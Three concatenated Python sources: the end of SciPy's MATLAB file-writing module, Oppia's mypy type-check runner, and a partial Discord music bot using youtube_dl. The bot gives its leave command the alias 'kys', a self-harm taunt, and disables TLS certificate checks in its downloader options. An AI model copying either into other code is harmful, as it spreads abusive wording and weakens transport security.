given filename, if not already present.
format : {'5', '4'}, string, optional
'5' (the default) for MATLAB 5 and up (to 7.2),
'4' for MATLAB 4 .mat files
long_field_names : bool, optional
False (the default) - maximum field name length in a structure is
31 characters which is the documented maximum length.
True - maximum field name length in a structure is 63 characters
which works for MATLAB 7.6+
do_compression : bool, optional
Whether or not to compress matrices on write. Default is False.
oned_as : {'column', 'row', None}, optional
If 'column', write 1-D numpy arrays as column vectors.
If 'row', write 1-D numpy arrays as row vectors.
If None (the default), the behavior depends on the value of `format`
(see Notes below).
See also
--------
mio4.MatFile4Writer
mio5.MatFile5Writer
Notes
-----
If ``format == '4'``, `mio4.MatFile4Writer` is called, which sets
`oned_as` to 'row' if it had been None. If ``format == '5'``,
`mio5.MatFile5Writer` is called, which sets `oned_as` to 'column' if
it had been None, but first it executes:
``warnings.warn("Using oned_as default value ('column')" +``
``" This will change to 'row' in future versions",``
``FutureWarning, stacklevel=2)``
without being more specific as to precisely when the change will take
place.
"""
file_is_string = isinstance(file_name, string_types)
if file_is_string:
if appendmat and file_name[-4:] != ".mat":
file_name = file_name + ".mat"
file_stream = open(file_name, 'wb')
else:
try:
file_name.write(b'')
except AttributeError:
raise IOError('Writer needs file name or writeable '
'file-like object')
file_stream = file_name
if format == '4':
if long_field_names:
raise ValueError("Long field names are not available for version 4 files")
MW = MatFile4Writer(file_stream, oned_as)
elif format == '5':
MW = MatFile5Writer(file_stream,
do_compression=do_compression,
unicode_strings=True,
long_field_names=long_field_names,
oned_as=oned_as)
else:
raise ValueError("Format should be '4' or '5'")
MW.put_variables(mdict)
if file_is_string:
file_stream.close()
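# Illustrative round-trip (hedged; the file name is hypothetical):
#     import numpy as np
#     savemat('out.mat', {'a': np.arange(3)}, oned_as='row')
#     loadmat('out.mat')['a'].shape  # (1, 3): 1-D arrays come back 2-D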
@docfiller
def whosmat(file_name, appendmat=True, **kwargs):
"""
List variables inside a MATLAB file
.. versionadded:: 0.12.0
Parameters
----------
%(file_arg)s
%(append_arg)s
%(load_args)s
%(struct_arg)s
Returns
-------
variables : list of tuples
A list of tuples, where each tuple holds the matrix name (a string),
its shape (tuple of ints), and its data class (a string).
Possible data classes are: int8, uint8, int16, uint16, int32, uint32,
int64, uint64, single, double, cell, struct, object, char, sparse,
function, opaque, unknown.
Notes
-----
v4 (Level 1.0), v6 and v7 to 7.2 matfiles are supported.
You will need an HDF5 python library to read matlab 7.3 format mat
files. Because scipy does not supply one, we do not implement the
HDF5 / 7.3 interface here.
"""
ML = mat_reader_factory(file_name, **kwargs)
variables = ML.list_variables()
if isinstance(file_name, string_types):
ML.mat_stream.close()
return variables
|
|
# coding: utf-8
#
# Copyright 2021 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MyPy test runner script."""
from __future__ import annotations
import argparse
import os
import site
import subprocess
import sys
from scripts import common
from scripts import install_third_party_libs
# List of directories whose files won't be type-annotated ever.
EXCLUDED_DIRECTORIES = [
'proto_files/',
'scripts/linters/test_files/',
'third_party/',
'venv/'
]
# List of files that should be type-annotated but are not.
NOT_FULLY_COVERED_FILES = [
'core/controllers/',
'core/domain/action_registry.py',
'core/domain/action_registry_test.py',
'core/domain/activity_jobs_one_off.py',
'core/domain/activity_jobs_one_off_test.py',
'core/domain/activity_services.py',
'core/domain/activity_services_test.py',
'core/domain/activity_validators.py',
'core/domain/activity_validators_test.py',
'core/domain/app_feedback_report_validators.py',
'core/domain/app_feedback_report_validators_test.py',
'core/domain/audit_validators.py',
'core/domain/audit_validators_test.py',
'core/domain/auth_jobs_one_off.py',
'core/domain/auth_jobs_one_off_test.py',
'core/domain/auth_services.py',
'core/domain/auth_services_test.py',
'core/domain/auth_validators.py',
'core/domain/auth_validators_test.py',
'core/domain/base_model_validators.py',
'core/domain/base_model_validators_test.py',
'core/domain/beam_job_validators.py',
'core/domain/beam_job_validators_test.py',
'core/domain/blog_services.py',
'core/domain/blog_services_test.py',
'core/domain/blog_validators.py',
'core/domain/blog_validators_test.py',
'core/domain/caching_services.py',
'core/domain/caching_services_test.py',
'core/domain/calculation_registry.py',
'core/domain/calculation_registry_test.py',
'core/domain/change_domain.py',
'core/domain/classifier_services.py',
'core/domain/classifier_services_test.py',
'core/domain/classifier_validators.py',
'core/domain/classifier_validators_test.py',
'core/domain/classroom_services.py',
'core/domain/classroom_services_test.py',
'core/domain/collection_domain.py',
'core/domain/collection_domain_test.py',
'core/domain/collection_jobs_one_off.py',
'core/domain/collection_jobs_one_off_test.py',
'core/domain/collection_services.py',
'core/domain/collection_services_test.py',
'core/domain/collection_validators.py',
'core/domain/collection_validators_test.py',
'core/domain/config_domain.py',
'core/domain/config_domain_test.py',
'core/domain/config_services.py',
'core/domain/config_services_test.py',
'core/domain/config_validators.py',
'core/domain/config_validators_test.py',
'core/domain/cron_services.py',
'core/domain/customization_args_util.py',
'core/domain/customization_args_util_test.py',
'core/domain/draft_upgrade_services.py',
'core/domain/draft_upgrade_services_test.py',
'core/domain/email_jobs_one_off.py',
'core/domain/email_jobs_one_off_test.py',
'core/domain/email_manager.py',
'core/domain/email_manager_test.py',
'core/domain/email_services.py',
'core/domain/email_services_test.py',
'core/domain/email_subscription_services.py',
'core/domain/email_subscription_services_test.py',
'core/domain/email_validators.py',
'core/domain/email_validators_test.py',
'core/domain/event_services.py',
'core/domain/event_services_test.py',
'core/domain/exp_domain.py',
'core/domain/exp_domain_test.py',
'core/domain/exp_fetchers.py',
'core/domain/exp_fetchers_test.py',
'core/domain/exp_jobs_one_off.py',
'core/domain/exp_jobs_one_off_test.py',
'core/domain/exp_services.py',
'core/domain/exp_services_test.py',
'core/domain/exploration_validators.py',
'core/domain/exploration_validators_test.py',
'core/domain/expression_parser.py',
'core/domain/expression_parser_test.py',
'core/domain/feedback_jobs_one_off.py',
'core/domain/feedback_jobs_one_off_test.py',
'core/domain/feedback_services.py',
'core/domain/feedback_services_test.py',
'core/domain/feedback_validators.py',
'core/domain/feedback_validators_test.py',
'core/domain/fs_domain.py',
'core/domain/fs_domain_test.py',
'core/domain/fs_services.py',
'core/domain/fs_services_test.py',
'core/domain/html_cleaner.py',
'core/domain/html_cleaner_test.py',
'core/domain/html_validation_service.py',
'core/domain/html_validation_service_test.py',
'core/domain/image_services.py',
'core/domain/image_services_test.py',
'core/domain/image_validation_services.py',
'core/domain/image_validation_services_test.py',
'core/domain/improvements_services.py',
'core/domain/improvements_services_test.py',
'core/domain/improvements_validators.py',
'core/domain/improvements_validators_test.py',
'core/domain/interaction_jobs_one_off.py',
'core/domain/interaction_jobs_one_off_test.py',
'core/domain/interaction_registry.py',
'core/domain/interaction_registry_test.py',
'core/domain/job_validators.py',
'core/domain/job_validators_test.py',
'core/domain/learner_goals_services.py',
'core/domain/learner_goals_services_test.py',
'core/domain/learner_playlist_services.py',
'core/domain/learner_playlist_services_test.py',
'core/domain/learner_progress_services.py',
'core/domain/learner_progress_services_test.py',
'core/domain/moderator_services.py',
'core/domain/moderator_services_test.py',
'core/domain/object_registry.py',
'core/domain/object_registry_test.py',
'core/domain/opportunity_jobs_one_off.py',
'core/domain/opportunity_jobs_one_off_test.py',
'core/domain/opportunity_services.py',
'core/domain/opportunity_services_test.py',
'core/domain/opportunity_validators.py',
'core/domain/opportunity_validators_test.py',
'core/domain/param_domain.py',
'core/domain/param_domain_test.py',
'core/domain/platform_feature_services.py',
'core/domain/platform_feature_services_test.py',
'core/domain/platform_parameter_domain.py',
'core/domain/platform_parameter_domain_test.py',
'core/domain/platform_parameter_list.py',
'core/domain/platform_parameter_list_test.py',
'core/domain/platform_parameter_registry.py',
'core/domain/platform_parameter_registry_test.py',
'core/domain/playthrough_issue_registry.py',
'core/domain/playthrough_issue_registry_test.py',
'core/domain/prod_validation_jobs_one_off.py',
'core/domain/question_domain.py',
'core/domain/question_domain_test.py',
'core/domain/question_fetchers.py',
'core/domain/question_fetchers_test.py',
'core/domain/question_jobs_one_off.py',
'core/domain/question_jobs_one_off_test.py',
'core/domain/question_services.py',
'core/domain/question_services_test.py',
'core/domain/question_validators.py',
'core/domain/question_validators_test.py',
'core/domain/rating_services.py',
'core/domain/rating_services_test.py',
'core/domain/recommendations_jobs_one_off.py',
'core/domain/recommendations_jobs_one_off_test.py',
'core/domain/recommendations_services.py',
'core/domain/recommendations_services_test.py',
'core/domain/recommendations_validators.py',
'core/domain/recommendations_validators_test.py',
'core/domain/rights_manager.py',
'core/domain/rights_manager_test.py',
'core/domain/role_services.py',
'core/domain/role_services_test.py',
'core/domain/rte_component_registry.py',
'core/domain/rte_component_registry_test.py',
'core/domain/rules_registry.py',
'core/domain/rules_registry_test.py',
'core/domain/search_services.py',
'core/domain/search_services_test.py',
'core/domain/skill_domain.py',
'core/domain/skill_domain_test.py',
'core/domain/skill_fetchers.py',
'core/domain/skill_fetchers_test.py',
'core/domain/skill_jobs_one_off.py',
'core/domain/skill_jobs_one_off_test.py',
'core/domain/skill_services.py',
'core/domain/skill_services_test.py',
'core/domain/skill_validators.py',
'core/domain/skill_validators_test.py',
'core/domain/state_domain.py',
'core/domain/state_domain_test.py',
'core/domain/statistics_validators.py',
'core/domain/statistics_validators_test.py',
'core/domain/stats_domain.py',
'core/domain/stats_domain_test.py',
'core/domain/stats_jobs_continuous.py',
'core/domain/stats_jobs_continuous_test.py',
'core/domain/stats_jobs_one_off.py',
'core/domain/stats_jobs_one_off_test.py',
'core/domain/stats_services.py',
'core/domain/stats_services_test.py',
'core/domain/storage_model_audit_jobs_test.py',
'core/domain/story_domain.py',
'core/domain/story_domain_test.py',
'core/domain/story_fetchers.py',
'core/domain/story_fetchers_test.py',
'core/domain/story_jobs_one_off.py',
'core/domain/story_jobs_one_off_test.py',
'core/domain/story_services.py',
'core/domain/story_services_test.py',
'core/domain/story_validators.py',
'core/domain/story_validators_test.py',
'core/domain/subscription_services.py',
'core/domain/subscription_services_test.py',
'core/domain/subtopic_page_domain.py',
'core/domain/subtopic_page_domain_test.py',
'core/domain/subtopic_page_services.py',
'core/domain/subtopic_page_services_test.py',
'core/domain/subtopic_validators.py',
'core/domain/subtopic_validators_test.py',
'core/domain/suggestion_jobs_one_off.py',
'core/domain/suggestion_jobs_one_off_test.py',
'core/domain/suggestion_registry.py',
'core/domain/suggestion_registry_test.py',
'core/domain/suggestion_services.py',
'core/domain/suggestion_services_test.py',
'core/domain/suggestion_validators.py',
'core/domain/suggestion_validators_test.py',
'core/domain/summary_services.py',
'core/domain/summary_services_test.py',
'core/domain/takeout_service.py',
'core/domain/takeout_service_test.py',
'core/domain/taskqueue_services.py',
'core/domain/taskqueue_services_test.py',
'core/domain/topic_domain.py',
'core/domain/topic_domain_test.py',
'core/domain/topic_fetchers.py',
'core/domain/topic_fetchers_test.py',
'core/domain/topic_jobs_one_off.py',
'core/domain/topic_jobs_one_off_test.py',
'core/domain/topic_services.py',
'core/domain/topic_services_test.py',
'core/domain/topic_validators.py',
'core/domain/topic_validators_test.py',
'core/domain/translatable_object_registry.py',
'core/domain/translatable_object_registry_test.py',
'core/domain/translation_fetchers.py',
'core/domain/translation_fetchers_test.py',
'core/domain/translation_services.py',
'core/domain/translation_services_test.py',
'core/domain/translation_validators.py',
'core/domain/translation_validators_test.py',
'core/domain/user_domain.py',
'core/domain/user_domain_test.py',
'core/domain/user_jobs_one_off.py',
'core/domain/user_jobs_one_off_test.py',
'core/domain/user_query_domain.py',
'core/domain/user_query_domain_test.py',
'core/domain/user_query_jobs_one_off.py',
'core/domain/user_query_jobs_one_off_test.py',
'core/domain/user_query_services.py',
'core/domain/user_query_services_test.py',
'core/domain/user_services.py',
'core/domain/user_services_test.py',
'core/domain/user_validators.py',
'core/domain/user_validators_test.py',
'core/domain/visualization_registry.py',
'core/domain/visualization_registry_test.py',
'core/domain/voiceover_services.py',
'core/domain/voiceover_services_test.py',
'core/domain/wipeout_jobs_one_off.py',
'core/domain/wipeout_jobs_one_off_test.py',
'core/domain/wipeout_service.py',
'core/domain/wipeout_service_test.py',
'core/platform/storage/cloud_storage_emulator.py',
'core/platform/storage/cloud_storage_emulator_test.py',
'core/platform_feature_list.py',
'core/platform_feature_list_test.py',
'core/storage/beam_job/gae_models.py',
'core/storage/beam_job/gae_models_test.py',
'core/storage/blog/gae_models.py',
'core/storage/blog/gae_models_test.py',
'core/storage/storage_models_test.py',
'core/tests/build_sources/extensions/CodeRepl.py',
'core/tests/build_sources/extensions/DragAndDropSortInput.py',
'core/tests/build_sources/extensions/base.py',
'core/tests/build_sources/extensions/base_test.py',
'core/tests/build_sources/extensions/models_test.py',
'core/tests/data/failing_tests.py',
'core/tests/data/image_constants.py',
'core/tests/data/unicode_and_str_handler.py',
'core/tests/gae_suite.py',
'core/tests/gae_suite_test.py',
'core/tests/load_tests/feedback_thread_summaries_test.py',
'core/tests/test_utils.py',
'core/tests/test_utils_test.py',
'core/jobs',
'core/python_utils.py',
'core/python_utils_test.py',
'extensions/',
'scripts/'
]
CONFIG_FILE_PATH = os.path.join('.', 'mypy.ini')
MYPY_REQUIREMENTS_FILE_PATH = os.path.join('.', 'mypy_requirements.txt')
MYPY_TOOLS_DIR = os.path.join(os.getcwd(), 'third_party', 'python3_libs')
PYTHON3_CMD = 'python3'
_PATHS_TO_INSERT = [MYPY_TOOLS_DIR]
_PARSER = argparse.ArgumentParser(
description='Python type checking using mypy script.'
)
_PARSER.add_argument(
'--skip-install',
help='If passed, skips installing dependencies.'
' By default, they are installed.',
action='store_true')
_PARSER.add_argument(
'--install-globally',
help='optional; if specified, installs mypy and its requirements globally.'
' By default, they are installed to %s' % MYPY_TOOLS_DIR,
action='store_true')
_PARSER.add_argument(
'--files',
help='Files to type-check',
action='store',
nargs='+'
)
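# Illustrative invocations (hedged; the module path is hypothetical):
#     python -m scripts.run_mypy_checks --files core/utils.py
#     python -m scripts.run_mypy_checks --skip-install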
def install_third_party_libraries(skip_install: bool) -> None:
"""Run the installation script.
Args:
skip_install: bool. Whether to skip running the installation script.
"""
if not skip_install:
install_third_party_libs.main()
def get_mypy_cmd(files, mypy_exec_path, using_global_mypy):
"""Return the appropriate command to be run.
Args:
        files: list(str)|None. List of file paths to type-check, or None to
            run the checks over the whole codebase.
        mypy_exec_path: str. Path of the mypy executable.
        using_global_mypy: bool. Whether the generated command should use the
            globally installed mypy.
Returns:
list(str). List of command line arguments.
"""
if using_global_mypy:
mypy_cmd = 'mypy'
else:
mypy_cmd = mypy_exec_path
if files:
cmd = [mypy_cmd, '--config-file', CONFIG_FILE_PATH] + files
else:
excluded_files_regex = (
'|'.join(NOT_FULLY_COVERED_FILES + EXCLUDED_DIRECTORIES))
cmd = [
mypy_cmd, '--exclude', excluded_files_regex,
'--config-file', CONFIG_FILE_PATH, '.'
]
return cmd
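# For example (hedged), get_mypy_cmd(['core/utils.py'], mypy_exec_path, False)
# yields [mypy_exec_path, '--config-file', './mypy.ini', 'core/utils.py'];
# with files=None, mypy checks '.' and --exclude gets the joined regex of the
# not-yet-covered paths listed above.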
def install_mypy_prerequisites(install_globally):
"""Install mypy and type stubs from mypy_requirements.txt.
Args:
install_globally: bool. Whether mypy and its requirements are to be
installed globally.
Returns:
tuple(int, str). The return code from installing prerequisites and the
path of the mypy executable.
"""
    # TODO(#13398): Change MyPy installation after Python3 migration. For now,
    # we install packages globally in CI, because pip installation there does
    # not behave the way we expect.
if install_globally:
cmd = [
PYTHON3_CMD, '-m', 'pip', 'install', '-r',
MYPY_REQUIREMENTS_FILE_PATH
]
else:
cmd = [
PYTHON3_CMD, '-m', 'pip', 'install', '-r',
MYPY_REQUIREMENTS_FILE_PATH, '--target', MYPY_TOOLS_DIR,
'--upgrade'
]
process = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.communicate()
if b'can\'t combine user with prefix' in output[1]:
        user_extension_args = ['--user', '--prefix=', '--system']
        new_process = subprocess.Popen(
            cmd + user_extension_args, stdout=subprocess.PIPE,
            stderr=subprocess.PIPE)
new_process.communicate()
_PATHS_TO_INSERT.append(os.path.join(site.USER_BASE, 'bin'))
mypy_exec_path = os.path.join(site.USER_BASE, 'bin', 'mypy')
return (new_process.returncode, mypy_exec_path)
else:
_PATHS_TO_INSERT.append(os.path.join(MYPY_TOOLS_DIR, 'bin'))
mypy_exec_path = os.path.join(MYPY_TOOLS_DIR, 'bin', 'mypy')
return (process.returncode, mypy_exec_path)
def main(args=None):
"""Runs the MyPy type checks."""
parsed_args = _PARSER.parse_args(args=args)
for directory in common.DIRS_TO_ADD_TO_SYS_PATH:
# The directories should only be inserted starting at index 1. See
# https://stackoverflow.com/a/10095099 and
# https://stackoverflow.com/q/10095037 for more details.
sys.path.insert(1, directory)
install_third_party_libraries(parsed_args.skip_install)
common.fix_third_party_imports()
print('Installing Mypy and stubs for third party libraries.')
return_code, mypy_exec_path = install_mypy_prerequisites(
parsed_args.install_globally)
if return_code != 0:
print('Cannot install Mypy and stubs for third party libraries.')
sys.exit(1)
print('Installed Mypy and stubs for third party libraries.')
print('Starting Mypy type checks.')
cmd = get_mypy_cmd(
parsed_args.files, mypy_exec_path, parsed_args.install_globally)
env = os.environ.copy()
for path in _PATHS_TO_INSERT:
env['PATH'] = '%s%s' % (path, os.pathsep) + env['PATH']
env['PYTHONPATH'] = MYPY_TOOLS_DIR
process = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
    # Standard output and error are returned as bytes; decode them before
    # printing.
print(stdout.decode('utf-8'))
print(stderr.decode('utf-8'))
if process.returncode == 0:
print('Mypy type checks successful.')
else:
print(
'Mypy type checks unsuccessful. Please fix the errors. '
'For more information, visit: '
'https://github.com/oppia/oppia/wiki/Backend-Type-Annotations')
sys.exit(2)
return process.returncode
if __name__ == '__main__': # pragma: no cover
main()
|
|
import os, errno, glob
import discord
import asyncio
from discord.ext import commands
import random
import youtube_dl
import functools
import datetime
import traceback
import subprocess
from concurrent.futures import ThreadPoolExecutor
from shutil import rmtree
from collections import deque
from itertools import islice
from BB.conf import Conf
from BB.permissions import *
# I am not original, so a lot of this is at least loosely based on the example
# playlist.py and possibly MusicBot, but what are you gonna do; not everything
# can be original.
# I'm sorry so much of this is a copy-paste or close rip of MusicBot's
# downloader.py. With the changes in the discord.py rewrite, I couldn't think
# of a better way to fetch remote audio.
# Anyway, here's a way to bass boost a file with ffmpeg, because why not:
# ffmpeg -i "filename..." -af bass=g=999 "outputname"
ytdl_options = {
'format': 'bestaudio/best',
'extractaudio': True,
'audioformat': 'mp3',
#'outtmpl': '%(id)s-%(title)s.%(ext)s',
'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',
'restrictfilenames': True,
'noplaylist': True,
'nocheckcertificate': True,
'ignoreerrors': False,
'logtostderr': False,
'quiet': True,
'no_warnings': True,
'default_search': 'auto',
'source_address': '0.0.0.0'
}
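# Illustrative use of these options (hedged; in this bot the actual extraction
# is delegated to BarryBot's downloader):
#     ydl = youtube_dl.YoutubeDL(ytdl_options)
#     info = ydl.extract_info('ytsearch:some query', download=False)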
youtube_dl.utils.bug_reports_message = lambda: ''
# discord.py's load_opus() requires the platform-specific name of the opus
# shared library (e.g. 'libopus.so.0' on Linux); if loading fails, fill in the
# name of the installed library manually here.
if not discord.opus.is_loaded():
    discord.opus.load_opus('opus')  # placeholder name; adjust for your system
class Player: #this represents commands and not an actual player/voicechan object
def __init__(self, bot, config, loop, mainbot):
self.bot = bot #commands related for making this all disorganized
self.config = config
self.loop = loop
self.BarryBot = mainbot #contains the Downloader and mainly everything
self.players = {} #format: self.players[serverID] = (channelplayer, playlist); playlist contains message/chan/vc/self etc
try:
rmtree(config.download_path)
except:
pass
@commands.command(aliases=["join", "come"])
async def summon(self, ctx):
'''Bring the bot into a voice channel
Server mods are allowed to use this command during music play.'''
if not ctx.author.voice:
raise impossible_noChannel
if ctx.guild.id in self.players:
try:
is_mod = Perms.is_guild_mod(ctx)
except:
is_mod = False
if self.players[ctx.guild.id][0].is_playing() and not is_mod:
raise currentlyPlaying
if ctx.author.voice.channel.id != self.players[ctx.guild.id][0].channel.id:
await self.players[ctx.guild.id][0].move_to(ctx.author.voice.channel)
self.players[ctx.guild.id][1].voice_channel = ctx.author.voice.channel
return
else:
raise alreadyJoined
try:
player = await ctx.author.voice.channel.connect()
        except discord.ClientException:
await ctx.send("It seems I'm in the channel but I can't see for sure. Let me refresh...", delete_after=15)
try:
del self.players[ctx.guild.id]
except:
pass
player = await ctx.author.voice.channel.connect()
self.players[ctx.guild.id] = (player, Playlist(self.BarryBot, ctx.channel, None, ctx.author.voice.channel, self, ctx))
return
self.players[ctx.guild.id] = (player, Playlist(self.BarryBot, ctx.channel, None, ctx.author.voice.channel, self, ctx))
@commands.command(aliases=["kys", "leave"])
@commands.check(Perms.is_guild_mod)
async def disconnect(self, ctx):
'''Make the bot leave the voice channel, killing the player
Only server mods can use this.'''
if ctx.guild.id not in self.players:
raise alreadyLeft
player = self.players[ctx.guild.id][0]
await player.disconnect()
del self.players[ctx.guild.id]
@commands.command()
async def play(self, ctx, *, url : str):
'''Queue an item on the music player
If I am not in a channel, I will join yours.
If I am not in your voice channel, I will move if I'm not playing music.
Bonus: Adding the -b flag just after the command and before the search terms or link will give an obnoxious bass boost to the song.
Example: !play -b poop'''
try:
is_mod = Perms.is_guild_mod(ctx)
except:
is_mod = False
if not ctx.author.voice:
if not is_mod:
raise noChannel
else:
pass
if ctx.guild.id not in self.players and ctx.author.voice:
await self.summon.invoke(ctx)
elif ctx.guild.id not in self.players and not ctx.author.voice:
raise modBypassAttempt
else:
if ctx.author.voice:
if ctx.author.voice.channel.id != self.players[ctx.guild.id][1].voice_channel.id and ctx.author.voice.channel.id != self.players[ctx.guild.id][0].channel.id:
if not is_mod:
if self.players[ctx.guild.id][0].is_playing():
raise outsideChannel
else:
await self.summon.invoke(ctx)
else:
if self.players[ctx.guild.id][0].is_playing():
pass
else:
await self.summon.invoke(ctx)
#basically this is a bunch of bypasses and permission checking
        # Strip the optional -b (bass boost) flag before looking the query up,
        # so the flag isn't treated as part of the search terms.
        bassboost = False
        if url.split()[0].lower() == "-b":
            if len(url.split()) == 1:
                raise specific_error("You did not specify a search term or link to use after the Bass Boost flag.")
            bassboost = True
            url = " ".join(url.split()[1:])
        change_later = await ctx.send("Looking...")
        try:
            info = await self.BarryBot.downloader.get_the_stuff(self.players[ctx.guild.id][1].loop, url, download=False, process=False)
        except:
            await change_later.delete()
            raise entryFailure
        if not info:
            await change_later.delete()
            raise entryFailure
if info.get('url', '').startswith('ytsearch'):
info = await self.BarryBot.downloader.get_the_stuff(
self.players[ctx.guild.id][1].loop,
url,
download=False,
process=True,
)
if not info:
await change_later.delete()
raise entryFailure
url = info['entries'][0]['webpage_url']
info = await self.BarryBot.downloader.get_the_stuff(self.players[ctx.guild.id][1].loop, url, download=False, process=False)
try:
self.players[ctx.guild.id][1].waitingTask.cancel()
except:
pass
if 'entries' in info:
#basically this would start a loop to queue each song from the list or something
await change_later.delete()
raise unsupportedPlaylist
else:
#check length of song and error if too long
if info.get('duration',0) > 10800:
await change_later.delete()
raise songTooLong
try:
entry, position = await self.players[ctx.guild.id][1].add_entry(url, queuer=ctx.author, bass=bassboost)
except:
await change_later.delete()
raise entryFailure
sendMessage = "Found and queued **%s** at position %s in the queue"
title = entry.name
self.players[ctx.guild.id][1].chan = ctx.channel
try:
self.players[ctx.guild.id][1].waitingTask.cancel()
except:
pass
if position == 1 and not self.players[ctx.guild.id][0].is_playing():
#make the player play the song and pretty much dont even need to queue it
sendMessage = "Found and queued **%s** to play as soon as possible!"
sendMessage %= title
await change_later.edit(content=sendMessage)
await self.BarryBot.delete_later(change_later, 30)
self.players[ctx.guild.id][1].temp_message = change_later
cur_entr = self.players[ctx.guild.id][1].current_entry()
await self.players[ctx.guild.id][1].entries[0].download()
if cur_entr.skipped:
return
self.players[ctx.guild.id][1].message = await self.players[ctx.guild.id][1].chan.send("Now playing in "+self.players[ctx.guild.id][0].channel.name+": "+str(self.players[ctx.guild.id][1].entries[0]))
await self.players[ctx.guild.id][1].entries[0].play(self.players[ctx.guild.id][0])
else:
#just add the queue and download it but dont do anything else
try:
time_to = await self.players[ctx.guild.id][1].time_to(position)
sendMessage += " - Rough estimation for when it will play: %s"
except:
time_to = "Error"
try:
sendMessage %= (title, position, time_to)
except:
sendMessage = "There was an error creating the final string, but "+title+" should have been queued anyways."
await change_later.edit(content=sendMessage)
await self.BarryBot.delete_later(change_later, 30)
if position == 2:
await self.players[ctx.guild.id][1].entries[1].download()
#await ctx.send(sendMessage, delete_after=30)
@commands.command(aliases=["vol"])
async def volume(self, ctx, *, vol : float = 0.050305):
'''Change the music player volume
The player default is 30%.
You can only change the volume by 30% at a time.
Server mods can bypass the change restriction.
The max volume is 200.'''
if ctx.guild.id not in self.players:
raise alreadyLeft
try:
is_mod = Perms.is_guild_mod(ctx)
except:
is_mod = False
        vol = vol/100
        # 0.050305 is a sentinel default meaning "no volume given": report the
        # current volume instead of changing it.
        if vol*100 == 0.050305:
            return await ctx.send("The current volume is at "+str(self.players[ctx.guild.id][1].volume * 100)+"%.", delete_after=15)
if abs(self.players[ctx.guild.id][1].volume - vol) > 0.3 and not is_mod:
raise drasticChange
if vol*100 > 200 or vol*100 < 1:
raise volOutOfBounds
if self.players[ctx.guild.id][0].is_playing():
self.players[ctx.guild.id][0].source.volume = vol
self.players[ctx.guild.id][1].volume = vol
await ctx.send("The volume has been changed to "+str(vol*100)+"%.", delete_after=15)
@commands.command(aliases=["queue", "que", "list"])
async def playlist(self, ctx):
'''Show the playlist'''
#add extra checks for the player
if ctx.guild.id not in self.players:
raise alreadyLeft
if len(self.players[ctx.guild.id][1].entries) == 0:
return await ctx.send("There are no entries in the playlist!", delete_after=15)
finalStr = ""
entries = self.players[ctx.guild.id][1].entries
overLimit = 0
for i in range(len(entries)):
if len(finalStr) > 1900:
overLimit += 1
if i == 0 and not overLimit:
finalStr = "Currently Playing: "+str(entries[i])
elif i == 1 and not overLimit:
finalStr = finalStr + "\n" + "Next Up: "+str(entries[i]) + "\n"
elif i > 1 and not overLimit:
finalStr = finalStr + "\n`" + str(i+1) + ".` "+str(entries[i])
if overLimit:
finalStr = finalStr + "\n\n" + "**...Plus "+str(overLimit)+" more...**"
await ctx.send(finalStr, delete_after=60)
@commands.command(aliases=["np", "playing"])
async def nowplaying(self, ctx):
'''Show the current playing song'''
if ctx.guild.id not in self.players:
raise alreadyLeft
if len(self.players[ctx.guild.id][1].entries) == 0:
return await ctx.send("There is nothing playing because there are no entries in the playlist!", delete_after=15)
if not self.players[ctx.guild.id][0].is_playing():
return await ctx.send("The music is paused on: "+str(self.players[ctx.guild.id][1].entries[0]))
await ctx.send("Currently Playing: "+str(self.players[ctx.guild.id][1].entries[0]))
@commands.command(aliases=["reorder", "randomize"])
async def shuffle(self, ctx):
'''Randomize the order of the playlist'''
if ctx.guild.id not in self.players:
raise alreadyLeft
if not ctx.author.voice:
try:
is_mod = Perms.is_guild_mod(ctx)
except:
is_mod = False
if is_mod:
pass
else:
raise noChannel
if len(self.players[ctx.guild.id][1].entries) == 0:
return await ctx.send("There are no entries in the playlist!", delete_after=15)
self.players[ctx.guild.id][1].shuffle()
await ctx.send("The playlist has been shuffled.", delete_after=15)
@commands.command(aliases=["listpurge"])
@commands.check(Perms.is_guild_mod)
async def clear(self, ctx):
'''Empties the playlist completely. The current song keeps playing
If you wish to just kill the entire player and remove it from the server, try !kys instead.'''
if ctx.guild.id not in self.players:
raise alreadyLeft
if len(self.players[ctx.guild.id][1].entries) == 0:
return await ctx.send("There are no entries in the playlist.", delete_after=15)
songs = len(self.players[ctx.guild.id][1].entries)
self.players[ctx.guild.id][1].clear()
return await ctx.send("I have removed "+str(songs)+" songs from the queue.", delete_after=20)
@commands.command()
async def skip(self, ctx, *, pos : int = 1):
'''Skip the current entry or the entry at the given position
If the person who added the song or a server mod uses this, it instantly works.
Otherwise, if 5 skip votes in general are given, the skip passes.'''
if ctx.guild.id not in self.players:
raise alreadyLeft
pos -= 1
try:
self.players[ctx.guild.id][1].entries[pos]
except:
raise entryDoesntExist
try:
is_mod = Perms.is_guild_mod(ctx)
except:
is_mod = False
if ctx.author.id in self.players[ctx.guild.id][1].entries[pos].skipvotes:
raise alreadySkipped
playlist = self.players[ctx.guild.id][1]
if playlist.entries[pos].author_obj.id == ctx.author.id or is_mod:
if pos == 0:
if self.players[ctx.guild.id][0].is_playing():
await ctx.send("The current song (**"+playlist.entries[pos].name+"**) has been skipped.", delete_after=15)
try:
self.players[ctx.guild.id][0].stop()
except:
raise skipFailure
else:
#await playlist.afterplay(None)
await ctx.send("The current song (**"+playlist.entries[pos].name+"**) has been skipped. The player wasn't playing (or was downloading), but the entry was removed.", delete_after=15)
playlist.entries[pos].skipped = True
if playlist.entries[pos].downloading:
return await playlist.afterplay(None)
playlist.entries.remove(playlist.entries[pos])
            else:
                # Capture the entry before removing it; indexing
                # playlist.entries[pos] again after removal would point at the
                # wrong entry (or raise IndexError).
                removed = playlist.entries[pos]
                removed.skipped = True
                playlist.entries.remove(removed)
                await ctx.send("The song (**"+removed.name+"**) at position "+str(pos+1)+" has been removed.", delete_after=15)
else:
playlist.entries[pos].skipvotes.add(ctx.author.id)
if len(playlist.entries[pos].skipvotes) >= 5:
if pos == 0:
if self.players[ctx.guild.id][0].is_playing():
